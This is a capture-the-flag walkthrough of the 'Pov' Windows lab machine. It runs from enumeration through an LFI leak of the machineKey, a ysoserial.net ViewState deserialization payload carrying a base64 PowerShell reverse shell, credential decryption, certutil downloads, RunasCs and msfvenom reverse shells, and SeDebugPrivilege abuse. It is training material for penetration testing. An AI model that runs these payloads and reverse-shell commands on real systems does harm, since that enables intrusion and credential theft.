Pov

External Enumeration

add to /etc/hosts 

10.129.45.174 Pov.htb

Nmap

nmap -sC -sV -T4 10.129.45.174

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 22:27 EST
Nmap scan report for 10.129.45.174
Host is up (0.033s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

  • Contact us page is not setup

Directory Scan - No Results

gobuster dir -u http://10.129.45.174 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/CSS                  (Status: 301) [Size: 148] [--> http://10.129.45.174/CSS/]
/Img                  (Status: 301) [Size: 148] [--> http://10.129.45.174/Img/]
/JS                   (Status: 301) [Size: 147] [--> http://10.129.45.174/JS/]

Vhost Scan - Dev.Pov.htb

ffuf -w subdomains.lst -u http://10.129.45.174  -H 'Host: FUZZ.POV.htb' -fs 12330

dev                [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 1610ms]

Add to /etc/hosts 

10.129.45.174 POV.htb dev.POV.htb

Checking Vhost - Dev.Pov.htb

http://dev.POV.htb

  • Stephen Fitz
  • Download CV Button

Capturing CV download with burp

Using LFI Vulnerability

..././web.config

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>
  • Creating malicious view state gadget to recieve RCE

Using ysoserial-dotnet

C:\Users\LABUser01\Desktop\ysoserial.net-master\ysoserial\bin\Debug>ysoserial.exe -p ViewState --examples
Try 'ysoserial -p ViewState --help' for more information.
Exmaples:

.NET Framework >= 4.5:
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
  • Create reverse shell with ysoserial
  • Using RevShell PowerShell #3 Base64
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAyADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"  --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
  • Malicious View State Shell
kdKQuCgdxD1JPLXuQ3DSikcURE%2F%2BxS%2FW%2BuAs121FX4lKyGrHIhkq5Jt6apbARFZuARh3EkdiUs0noZYTWQoIj60XuuuVzgrThNae9roOyNMh74yDe84uNPLMolbwaRdRLfHar15CN%2FJFUwy%2FA%2B1MlRzk0mnrcUTOvgo2xxjdRSmjam%2Fn9v5M1pPA2ewwzAX0AGIDBqLB7Ov43FfcW2chucjc4q%2FWCpzYzDRW3E1WSDsXjY4A7r1d0idE7AvWLFT659HqeARqNbxJbyUFgk1PysMhk0umAV1pMjZLKEptt1KXU7SjCFDaWSYKvovJwixaYkCiuuGarekZgtwrgEL3PqdjTre12Iw5Zs%2BtwgeduLALQ9DZQsEaMvgxJyLgodAu4i14qB%2F%2FxfDfQI8i5IKy1LLYFk9TNzvf3dp0f%2FHZyoJUvZuN7cPiDwBVwT3EIDtiSLejIEn3DQIdVitK5lMz6dJEoR9phvTvVlcTtmvXy%2FcDXE%2Brfo8RAZX7aoepFIgzWlOE4bci77b%2BLE2fIbJ8v2a7bd26VHa1OQ0vKUXvI1Eynw9mib2%2B7MJVLlY2b5XadGUegsLfzjNOXDVMdIU9qxEYn6sU9IOJAlJFiX9%2FEZkHfWHR%2Fu%2BvvyPhmujMxgLXFCS79OwF%2F%2FLzyB6rpo8kZ7Wt4RxvtYky1sELjk8QxENwYw6RLCcz2hZ2RSHjjHG3PicnjUjmFslZuKwlS337x5wIBkMDxRzxi71qvoEEN%2FtitxxaXrKptsH31nxShjqPqzeK0hrSKtipcqDmM7VKc7u6VXncmd6srlkCLBa5V1YKuobi0u8JJKCaxsRCEEhV9hHtn0v11mvH%2BYtpGt3yyWtw3EVr0%2BL3FybbUtOIBgqr4QQTcXi%2FU248MI7GUTzIltPx6sn%2FVG8yCcUQeVC%2BWmEKFUOh5e4eyMpWJ82h4JArAD0fn1yf0wIjeLDKkDBR%2Fm%2BSOb8FXk1nDndnynwy02FBueL47CA4VNj9YZv3X7eTiDyYVG6uLRCIjFdz6iYd7wfs0MM7EZuG%2Bdl3wdrEMGoVdCL3pUttFUYxo9ENxHtMpvvaGAKFxKBTXtDyDSxXVTSXVpzbNRVpFiPCS%2BCkkSE71ee%2BrV1saCDcTj1YqEX9ylI4sEGQrgNZzcfhRiIOZpNzejOnPjKyYlSMLaLOh%2FlrudaXvh6YcleUvt0lhrmPSwy5BBNzhhUKhzt0o7yRHgAf%2BtrcJzxNTF%2FzZOQ5FMEiir4sK0QwFCzRkbccFyuYwgB%2BuhH9Z8VlTr5WlbRgXyIa%2FT9cDYfPrmd1gonLQ1gtPi6E7jM489CcPG%2BHEmLB5I%2F02GdljGcmrtTQ0j3ogyoNsV1F%2BNbeF8G37N59ZR040dIQHycsPxzMjuOFkr217vUG6ICiGbD6ZXM%2B0hHvs6ZtTfHKu7O4ABFUp4rj2JQ6NhDBUU72EvjoZLeTtPv5KgRzcuqMZtggjh80QLcRwU%2FdUevPEEseR8Zx5S%2B0UAIlr4eq9AsTc8%2F%2FZXAAk5mmiVcec5W9IqkuZvgHN2OlMVNNeNwSgMky8uXEqy7Yg5uVgea7kszVWDDUai2MdxKR7zcpXyPH83VLs3%2Bdwq54kd%2BaCPXym1rX5JrL5NY3okZGOuQrB9XxzfuxfGP4%2FgeFhTJMNKozfS22pX3jE3QI2OcJrdQfzs%2FquSV78sLfCh7Rf5J4rtYiTdz39mEoEFDIwdLZEEQhCkT%2Bw6hclrTmYTbHSsh5tt3rQfN%2BReso1R0%2BfRKtdKgTcc4eM%2FBlEsuQNotLeB2zzhvWG51oFOxqT1jpUUjtGe90xAY5QCCM0OtqYOXzTdOCUtQf8Rcgg359Pj3i%2BBMzuPhy9wKWq727ngnefWjLLdFlLl49j3Wsral2VkWMWEa77ZB%2BGBN4Flfpfy0h3s3if3kyI0QmaPYXMaEUEBpE6MzdKskupaBFPV2QuKnTkiw1lvUlW5lRd8YjGQWNC2bHviDMuMuVXn%2FqfNPwRwnxw2J%2BnbYSH8kkdLM7jB7IUeCfn1NOPWk%2BfYoGFsmSbivF%2FzjvrO9tqhEeJ1UN%2FM7OYMxhq4OLW0wEA4GU37azMDANOBWEjH1edD84C384cWNwzAmAFmoYETEDeMhPO9u3I%2F6humBwUwsma4X26NM%2FAySUbZeC8CdOcFuNTF1%2BSkmad8bDnZPmjfSG5gDBdf%2B2eDPVNn%2BAym%2FpcD4DrkmgfkSGl62zfnPE1l31%2FyS4%2F4D%2F3Mkq%2BVs4nUJbHyP6F9br2er%2FeblwJXDEgpts45ZqlnT4MP%2B6E9%2FXhS0F6vyCJ78QBz8rys2ClIdNecSV571WP8hvEFfY22qIPVzVgCNNLoiLEgQkaMULRbJ0sZBUzsroE1J0LwPbDXEmlGPJc%2FFEsbSoEnze2OVIex7MCvl%2Fso1m6Vp2jxpGZQgEX1Ec%2F9q7eybQiVsEdjn3wrL8NYGU5On9gGSc1NC2M%2BzBIMQgoXVzr9YznkbuG04lRGL58%2FRdhIV5XRKU0PMdtc7jlshU5LeN1Tpi9HYKWyxUzkbF4GbeQJzOrcGYb5Ubnv1v877ThBJvLCBpjwpgFSYb%2BtkTE64F5DO3UOwRIdbasQXnApQPS8ULkn8SutleDiMBXS6qEsfmtZfrI0%2F%2BY3glyJDcqIteaLD7TjXDedNYOb3MmRoDepi5xGTPnVBvgzwCvfeKHdGnUjictGwI4XO%2F3XI%2FIrXLardyO%2Fomx7Jqt%2B%2F3fKQFN7h6XsqcOUDm6HOoLit5b3YPPyhOj14J5AGAGCYm7mVvGwr7xfriC1YUbbWs7wbOGE0umMKtx8oFok07qPWf9%2FAT3bfD5NCeXMhofjnxoMVSdPeHt%2Bws2dj2CtFuKukTRE0ytUa6owMn0vkQNd1B5kwGuwJFeFw6O8NcvDvEwY9Jes9fwbgE57jhNImONLLr974uc3CVa6M%2FKDlS2tZ8ri%2B7QEPO7%2FHkFAMF5KaTpn3P9NyE0uPl5dEJX8QzmIvEmd0u0FKbFSSJERmtGtaZvOt1dLVsZdrtsiBi9IyTt9K0yVMUgJqA%2FWMljaDQMrljR%2BH4XSNlsM1Qi9hPWIrduLSW8jtkU7bwrUvdmg%3D%3D

Gaining Shell as sfitz

Checking Privileges

PS C:\Users\sfitz\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Checking Services

PS C:\Users\sfitz\Documents> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1408
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       628
  TCP    10.129.230.183:139     0.0.0.0:0              LISTENING       4
  TCP    10.129.230.183:49671   10.10.14.128:4444      ESTABLISHED     4976
PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>
  • Username alaading

Creating PS Credential

$pwd = ConvertTo-SecureString 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6
  • Checking credentials
PS C:\Users\sfitz\Documents> $cred = New-Object System.Management.Automation.PSCredential("alaading", $pwd)
PS C:\Users\sfitz\Documents> $cred

UserName                     Password
--------                     --------
alaading System.Security.SecureString
  • Getting Clear Text Password
PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential().password
f8gQ8fynP44ek1m3

alaading:f8gQ8fynP44ek1m3

  • Getting Shell as alaading
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAyADgAIgAsADUANQA1ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA}

Gaining Shell as alaading - User Flag

PS C:\Users\alaading\Documents> whoami
pov\alaading

type C:\Users\alaading\Documents\Desktop\user.txt
fcb23d2b6d437380eedda77ca1e9b039

fcb23d2b6d437380eedda77ca1e9b039

Checking Privileges

PS C:\Users\alaading\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
  • Compiling / Transferring 
#compile on windows vm
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs

python3 -m http.server

certutil.exe -urlcache -f http://10.10.14.128:8000/RunasCs.exe RunasCs.exe

nc -nvlp 9001
./RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.14.128:9001
  • SeDebugPrivilege is now enabled
└──╼ $nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.230.183 49690
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled 
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Attacking SeDebugPrivilege

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.128 LPORT=4000 -f exe > revshell.exe

certutil.exe -urlcache -f http://10.10.14.128:8000/revshell.exe revshell.exe

msfconsole -q
use multi/handler
set LHOST tun0
set LPORT 4000
set payload windows/x64/meterpreter/reverse_tcp
run

./revshell.exe
tasklist
winlogon.exe                   536 Console                    1     16,232 K

Obtaining Root Shell - Root Flag

(Meterpreter 18)(C:\users\alaading\Desktop) > migrate 536
[*] Migrating from 4648 to 536...
[*] Migration completed successfully.

(Meterpreter 18)(C:\Users\Administrator\Desktop) > cat root.txt
19e1120c2dbf1e4f1006c079d5da3496

19e1120c2dbf1e4f1006c079d5da3496